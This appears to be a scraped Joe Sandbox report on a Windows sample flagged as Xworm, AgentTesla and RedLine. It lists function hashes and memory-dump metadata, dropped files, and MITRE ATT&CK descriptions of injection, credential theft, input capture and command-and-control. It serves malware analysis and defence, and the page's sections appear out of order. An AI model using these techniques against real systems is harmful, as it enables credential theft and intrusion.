Function 07A3ECD8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1571985880.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7a30000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9c868dc35fa7647c2051cbd5271fcad0f65975f33d55c50e6c26e0ab5640a25
Instruction ID: 20332bc6de70618fd1c4df32a8fe58678221721511c4ac6a74205eb44d5d244d
Opcode Fuzzy Hash: f9c868dc35fa7647c2051cbd5271fcad0f65975f33d55c50e6c26e0ab5640a25
Instruction Fuzzy Hash: 8CD02230310A248FCB00AB2CF40489837ECEF4962130000AAF206CB334CEA1BC008BC5

Function 07DB52C0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4999b7a270ff08e55ea34bfb44aadd9179810ede4418b93a984b2a197668b6af
Instruction ID: 12b96a8a6763e2a920783b1d3002dd453a430d4bcd44a50dff421b6cbcc683a8
Opcode Fuzzy Hash: 4999b7a270ff08e55ea34bfb44aadd9179810ede4418b93a984b2a197668b6af
Instruction Fuzzy Hash: 05B0123618F7D89FC3030B346DB11C06FB09D0F17030981C3D484850539131085FC755

Function 07DB285C Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cdd129af8fe574afe7463f92a011a3a1e3eb3a9818aa731a7ea32f33b9d703f
Instruction ID: 96aad53f2c0b60b656d5cc696c84c97a066486f56da2c5206507b8a5696862e9
Opcode Fuzzy Hash: 9cdd129af8fe574afe7463f92a011a3a1e3eb3a9818aa731a7ea32f33b9d703f
Instruction Fuzzy Hash: 7EC08CBB940119E6EB304394B0093D8BBA0F380322F0000A6C186810104B2C926AD653

Function 07A3E8A0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1571985880.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7a30000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1383e8cc6cdd02b41743dd770cada1654d095da1f7d2e06fafdfdecc616354a
Instruction ID: bf80e23c98d6f9de9bbe31c0fbae8c6bba536dafb012f176c231851490a85e55
Opcode Fuzzy Hash: a1383e8cc6cdd02b41743dd770cada1654d095da1f7d2e06fafdfdecc616354a
Instruction Fuzzy Hash: 0EC0123245060C8EC740BAA8E814899BBBCAB15301B00822AE4492A211EB20A1A9CB91

Function 07A3E870 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1571985880.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7a30000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5bc6201f4f9b99a432e9fecc7f76009bed6aed455b1f3b4c97709a0311a30b7
Instruction ID: d8707251467a3495739e34583eaad488dde130b43f096ad03f1b1a0999099f9f
Opcode Fuzzy Hash: a5bc6201f4f9b99a432e9fecc7f76009bed6aed455b1f3b4c97709a0311a30b7
Instruction Fuzzy Hash: 3BC0123145060C8FC700BAA8E8148A8BBB8AB55300B40522AE44A2A120EF30A5A9CB91

Function 07A3E8A2 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1571985880.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7a30000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd7b09e0b570041af5e6769cae91f8d6cd0dce7d811ff97238318b8a2f929813
Instruction ID: 2ca86c956eebb18bfe20b826a4f588b618887aa0770d4cce016ae927ca58645d
Opcode Fuzzy Hash: fd7b09e0b570041af5e6769cae91f8d6cd0dce7d811ff97238318b8a2f929813
Instruction Fuzzy Hash: A4C012324409088EC740FA68E4144987F38AF25301B00822AE049AA110EB2191AACB40

Non-executed Functions

Function 07DD7780 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$q, xrefs: 07DD7D0B
$q, xrefs: 07DD7D01
$q, xrefs: 07DD7D17
$q, xrefs: 07DD7C62
$q, xrefs: 07DD78CA
$q, xrefs: 07DD78A5
$q, xrefs: 07DD7899
$q, xrefs: 07DD78D6
$q, xrefs: 07DD7CF5
$q, xrefs: 07DD7C56

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-1298971921
Opcode ID: b180e96b3fe0f69af349359f28331a238e6aa3b7285ccbcb2af4d9f8fab9c00b
Instruction ID: bf36032043f82321ea11e5f65f55c01ec4d587a9c787eeaeed60463418a47c8d
Opcode Fuzzy Hash: b180e96b3fe0f69af349359f28331a238e6aa3b7285ccbcb2af4d9f8fab9c00b
Instruction Fuzzy Hash: FF121970E00219CFDB24DB69D854BADF7B2FF88315F2485A9D40AAB354DB319D85CB90

Function 07DD38C8 Relevance: 32.8, Strings: 26, Instructions: 279COMMON

Download Yara Rule

Strings

DZj, xrefs: 07DD3B59
DZj, xrefs: 07DD3B0F
DZj, xrefs: 07DD38E4
DZj, xrefs: 07DD3953
DZj, xrefs: 07DD3978
DZj, xrefs: 07DD3C37
DZj, xrefs: 07DD3A7B
DZj, xrefs: 07DD3A31
DZj, xrefs: 07DD39E7
DZj, xrefs: 07DD392E
DZj, xrefs: 07DD3C12
DZj, xrefs: 07DD3A0C
DZj, xrefs: 07DD3AC5
DZj, xrefs: 07DD3C81
DZj, xrefs: 07DD39C2
DZj, xrefs: 07DD3C5C
DZj, xrefs: 07DD3BA3
DZj, xrefs: 07DD3A56
DZj, xrefs: 07DD3BC8
DZj, xrefs: 07DD3BED
DZj, xrefs: 07DD3B7E
DZj, xrefs: 07DD399D
DZj, xrefs: 07DD3909
DZj, xrefs: 07DD3B34
DZj, xrefs: 07DD3AEA
DZj, xrefs: 07DD3AA0

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj
API String ID: 0-1552671504
Opcode ID: 1c4819689f98bb2dcfebf8a535c441399b0c918db9573e52bab3bbeacd89fb94
Instruction ID: dc4a6c3daae303e4bb312b1a95255a41d6487a6ab49e9eb31ac1739a7c888ead
Opcode Fuzzy Hash: 1c4819689f98bb2dcfebf8a535c441399b0c918db9573e52bab3bbeacd89fb94
Instruction Fuzzy Hash: 5291B0303007116BD606EBE1989176D7A93FBCA701B414928E7050F781CFBE3C1A4BAB

Function 07DD38D8 Relevance: 32.8, Strings: 26, Instructions: 273COMMON

Download Yara Rule

Strings

DZj, xrefs: 07DD3B59
DZj, xrefs: 07DD3B0F
DZj, xrefs: 07DD38E4
DZj, xrefs: 07DD3953
DZj, xrefs: 07DD3978
DZj, xrefs: 07DD3C37
DZj, xrefs: 07DD3A7B
DZj, xrefs: 07DD3A31
DZj, xrefs: 07DD39E7
DZj, xrefs: 07DD392E
DZj, xrefs: 07DD3C12
DZj, xrefs: 07DD3A0C
DZj, xrefs: 07DD3AC5
DZj, xrefs: 07DD3C81
DZj, xrefs: 07DD39C2
DZj, xrefs: 07DD3C5C
DZj, xrefs: 07DD3BA3
DZj, xrefs: 07DD3A56
DZj, xrefs: 07DD3BC8
DZj, xrefs: 07DD3BED
DZj, xrefs: 07DD3B7E
DZj, xrefs: 07DD399D
DZj, xrefs: 07DD3909
DZj, xrefs: 07DD3B34
DZj, xrefs: 07DD3AEA
DZj, xrefs: 07DD3AA0

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj$DZj
API String ID: 0-1552671504
Opcode ID: 76082b91ec206f966ea9de2ee664ee75891b646a8601bcff5b39ea7cdd01cc38
Instruction ID: f3d4f1e902c0b805aae385365d79b630c3a7e17453d6dc1f27aed5422777284a
Opcode Fuzzy Hash: 76082b91ec206f966ea9de2ee664ee75891b646a8601bcff5b39ea7cdd01cc38
Instruction Fuzzy Hash: 3491AF303007116BD606EAE1989576D7697FBCA701B414938E7050F781CFBE7D1A4BAB

Function 07DDAA20 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$q, xrefs: 07DDAB22
$q, xrefs: 07DDAB9C
$q, xrefs: 07DDABD2
$q, xrefs: 07DDABDE
$q, xrefs: 07DDAB7D
$q, xrefs: 07DDABA8
$q, xrefs: 07DDAB16
$q, xrefs: 07DDAB71

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-3886557441
Opcode ID: 7fa9e845e7d9b80cfea123c2bec3074de311c0eb18a3815f737e0bdfe6d213cb
Instruction ID: 19201cd12fc2229fb72889a7180dff2793a1eb6cff7373097007d9de214a80ee
Opcode Fuzzy Hash: 7fa9e845e7d9b80cfea123c2bec3074de311c0eb18a3815f737e0bdfe6d213cb
Instruction Fuzzy Hash: AA917FB0A0020ADFDB24DF65E5547AEBBB2FF85315F15C529E4029B394DB749C42CB90

Function 07DD7180 Relevance: 7.9, Strings: 6, Instructions: 405COMMON

Download Yara Rule

Strings

$q, xrefs: 07DD74BC
$q, xrefs: 07DD7688
$q, xrefs: 07DD74C8
$q, xrefs: 07DD761C
$q, xrefs: 07DD7694
$q, xrefs: 07DD7462

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q
API String ID: 0-2069967915
Opcode ID: a2df52a03674ab37407b9fc5177c22ef95ca33dcb00309f20a79c9ff5406a792
Instruction ID: fde46451e9175d02391ce1fedb3e511214c76993bdf34c6f6b0ff4a2c3f6819e
Opcode Fuzzy Hash: a2df52a03674ab37407b9fc5177c22ef95ca33dcb00309f20a79c9ff5406a792
Instruction Fuzzy Hash: A1F15C70B01209CFDB14EFA9D494B6EBBB2FF88355F258569D4469B394DB34AC42CB80

Function 07DDE5C8 Relevance: 7.7, Strings: 6, Instructions: 197COMMON

Download Yara Rule

Strings

$q, xrefs: 07DDE7C9
$q, xrefs: 07DDE795
$q, xrefs: 07DDE761
$q, xrefs: 07DDE7D5
$q, xrefs: 07DDE7A1
$q, xrefs: 07DDE76D

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q
API String ID: 0-2069967915
Opcode ID: 67e916ea7352da72d833c5d44f0771b3cedc9a03d3914099cab77dc5ebb6609a
Instruction ID: 57e6b827cf3c2e9df7bfb898874809dbbabd879cc5abb2c16a20d4c138e16e61
Opcode Fuzzy Hash: 67e916ea7352da72d833c5d44f0771b3cedc9a03d3914099cab77dc5ebb6609a
Instruction Fuzzy Hash: C8717DB0A0021AAFDB68DB69D8406ADF7B2FF85310F248569D446AF240DB75ED46CB81

Function 07DD84B8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$q, xrefs: 07DD8777
$q, xrefs: 07DD8783
$q, xrefs: 07DD8712
$q, xrefs: 07DD871E

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: 73cce5e91e8b026d99b53dc3026a6ce72901269e056eec090bb49cf0f113d2c0
Instruction ID: df1f3a58f60ee99da942a6a67a937fbe2e314d9ee44d41fd7920f6d4aa50c274
Opcode Fuzzy Hash: 73cce5e91e8b026d99b53dc3026a6ce72901269e056eec090bb49cf0f113d2c0
Instruction Fuzzy Hash: 8EB14C70A002198FDB25DFA9D5907AEFBB2FF88305F248429D4069B394DB35DC82DB91

Function 07DD88D0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LRq, xrefs: 07DD8A12
LRq, xrefs: 07DD89C3
$q, xrefs: 07DD894F
$q, xrefs: 07DD895B

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: LRq$LRq$$q$$q
API String ID: 0-2204215535
Opcode ID: 486dd802247e7684a1a80a4acbdd00c0c869e88f4fd52370776ba5dfad14d54b
Instruction ID: 3becb6445dbf5ba035187e62b36d6fe1c6a3c0f68b51538ef62fc24c843bc9a1
Opcode Fuzzy Hash: 486dd802247e7684a1a80a4acbdd00c0c869e88f4fd52370776ba5dfad14d54b
Instruction Fuzzy Hash: EC51E270B002069FDB19DB69D990B6EB7B2FF89300F149A69E4469B394DB34EC41CB51

Function 07DDADA8 Relevance: 5.2, Strings: 4, Instructions: 165COMMON

Download Yara Rule

Strings

$q, xrefs: 07DDAF84
$q, xrefs: 07DDAF2C
$q, xrefs: 07DDAF5B
$q, xrefs: 07DDAED9

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: b44d4cb5c0b579ab38ab737b7151d49989149cefdc5b13da3e4d6c84f0a7ca04
Instruction ID: 6bd122a32c4c2d737f98244f242e259d73cbf20077e60227884cfd27a2ddfaac
Opcode Fuzzy Hash: b44d4cb5c0b579ab38ab737b7151d49989149cefdc5b13da3e4d6c84f0a7ca04
Instruction Fuzzy Hash: D9515EB4B002069FCF25DA68E4906ADF7B2EF89211F24C96AE405DB354DB35EC42CB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RFQPO3D93876738.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: Agenttesla

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RFQPO3D93876738._69117b6fa6abf2ab552dc9e9e6eebfb7cefe11e1_bcac15c1_27a11465-d65d-4af1-9f91-68ca1f60d89f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA61.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC46.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC76.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AddInProcess32.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13w5zsur.1xi.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4nqchips.teg.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d03rotq0.ztr.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppdfzt4y.u2z.psm1

C:\Windows\appcompat\Programs\Amcache.hve

Windows Analysis Report
RFQPO3D93876738.scr.exe

Function 00007FFAAC481A88 Relevance: 3.2, Strings: 2, Instructions: 736
COMMON

Function 00007FFAAC487BE0 Relevance: 2.2, Strings: 1, Instructions: 924
COMMON

Function 00007FFAAC483AC0 Relevance: 1.7, Strings: 1, Instructions: 463
COMMON

Function 00007FFAAC48291A Relevance: 1.6, APIs: 1, Instructions: 136
memoryCOMMON

Function 00007FFAAC497879 Relevance: 1.6, APIs: 1, Instructions: 118
memoryCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
